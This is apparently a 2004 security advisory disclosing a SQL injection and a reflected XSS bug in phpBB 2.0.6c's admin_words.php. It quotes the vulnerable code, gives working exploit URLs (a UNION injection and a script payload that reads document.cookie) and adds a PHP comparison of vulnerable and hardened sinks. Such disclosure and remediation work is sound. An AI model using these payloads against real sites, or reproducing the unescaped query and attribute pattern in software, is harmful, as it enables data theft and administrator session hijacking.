[waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c]
{================================================================================}
{                            [waraxe-2004-SA#009]                                }
{================================================================================}
{                                                                                }
{        [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ]              }
{                                                                                }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 16 March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
phpBB is a widely used and very popular forum software, written in PHP.
Homepage: http://www.phpbb.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Original code from admin_words.php ($Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45), starting from line 74:
-------------------------------
if( $mode == "edit" )
{
    if( $word_id )
    {
        // $word_id comes straight from the request and is used unchanged: SQL sink
        $sql = "SELECT *
            FROM " . WORDS_TABLE . "
            WHERE word_id = $word_id";
        if(!$result = $db->sql_query($sql))
        {
            message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql);
        }

        $word_info = $db->sql_fetchrow($result);

        // the same unfiltered value is written into the form: HTML sink
        $s_hidden_fields .= '<input type="hidden" name="id" value="' . $word_id . '" />';
    }
    else
    {
        message_die(GENERAL_MESSAGE, $lang['No_word_selected']);
    }
}
--------------------------------
As we can see, the parameter $word_id is placed into the SQL query WITHOUT single quotes and without being cast to an integer, so SQL injection is possible, for example with the UNION method:
http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION%20ALL%20SELECT%20null/*
and we get this error feedback (the column-count mismatch confirms the injected UNION was parsed):
------------------------------------------------
Error Could not query words table
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*
Line : 83
File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php
------------------------------------------------
With so-called "blind" SQL injection methods, we can pull any information out of the SQL database. So why am I categorizing this bug as "non-critical"? Because we first have to be logged in as a forum administrator for the attack to succeed. So it's not such a "useful" security bug ;)
But let's think again: what if we make a request like this one?
http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><script>alert(document.cookie);</script
The same unfiltered value is also written into the hidden form field (value="' . $word_id . '"), so the " closes the attribute, the > closes the tag, and the script runs in the browser of whoever opened the link. The /* at the start of the payload turns the rest of the SQL query into a comment, so the query executes without error and the script reaches the line that emits the hidden field. Since the only possible victim is a logged-in administrator, alert(document.cookie) shows exactly what this reflected XSS can steal. So, in this way we can turn a not-so-useful SQL injection bug into a very useful XSS exploit.
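As an added example (not phpBB's code and not part of the original advisory), the following PHP rebuilds the two sinks from admin_words.php offline and puts a hardened version beside them. It needs no database or web server: the functions only return the SQL string and the HTML fragment the script would produce for each of the two payloads above. The function names, the rejection of non-positive ids, and the payload list are this example's own assumptions.

```php
<?php
// Added example (not phpBB's code): the two sinks in admin_words.php rebuilt
// offline, beside a hardened version. No database or web server is needed;
// the functions only return the SQL string and the HTML fragment the script
// would produce. Function names and payloads below are this example's own.

define('WORDS_TABLE', 'phpbb_words');   // table name as in phpBB 2.0.x

// Vulnerable pattern: the raw request parameter reaches both sinks unchanged.
function vulnerable_sinks($id)
{
    $sql  = "SELECT * FROM " . WORDS_TABLE . " WHERE word_id = $id";
    $html = '<input type="hidden" name="id" value="' . $id . '" />';
    return array($sql, $html);
}

// Any value written into an attribute gets entity-encoded first, so a quote
// or angle bracket in it can no longer close the attribute or the tag.
function safe_hidden_field($name, $value)
{
    return '<input type="hidden" name="' . htmlspecialchars($name, ENT_QUOTES)
         . '" value="' . htmlspecialchars((string) $value, ENT_QUOTES) . '" />';
}

// Hardened pattern: word_id is an integer key, so cast it once with intval()
// (the phpBB 2.0 DBAL builds plain query strings, there are no bound
// parameters) and reject anything non-positive. The "<= 0" rule is this
// example's assumption; the original only checks if( $word_id ).
function hardened_sinks($id)
{
    $word_id = intval($id);
    if ($word_id <= 0) {
        return array(null, null);           // caller would message_die() here
    }
    $sql  = "SELECT * FROM " . WORDS_TABLE . " WHERE word_id = " . $word_id;
    $html = safe_hidden_field('id', $word_id);
    return array($sql, $html);
}

// Constructed inputs: the two payloads from the advisory, URL-decoded.
$payloads = array(
    'sqli' => '-1 UNION ALL SELECT null/*',
    'xss'  => '1/*"><script>alert(document.cookie);</script>',
);

foreach ($payloads as $name => $p) {
    list($sql, $html) = vulnerable_sinks($p);
    echo "[$name] vulnerable SQL : $sql\n";
    echo "[$name] vulnerable HTML: $html\n";
    list($sql, $html) = hardened_sinks($p);
    echo "[$name] hardened SQL   : " . ($sql === null ? '(rejected)' : $sql) . "\n";
    echo "[$name] hardened HTML  : " . ($html === null ? '(rejected)' : $html) . "\n";
    // What encoding alone does to the raw payload, for comparison:
    echo "[$name] encoded raw    : " . safe_hidden_field('id', $p) . "\n\n";
}
```

Run it with the PHP CLI. For the UNION payload, intval() yields -1 and the request is rejected before any query is built; for the XSS payload, intval() yields 1, so the query becomes WHERE word_id = 1 and the hidden field carries only "1". The last line of each block shows that htmlspecialchars() on its own would already turn the "><script> fragment into &quot;&gt;&lt;script&gt;, which is why both the cast and the encoding belong in the fix: the cast protects the query, the encoding protects every place the value is rendered.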
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to the torufoorum staff and to all IT security related people in
Estonia! Greetings!
Special greets to ulljobu!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@xxxxxxxxx
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------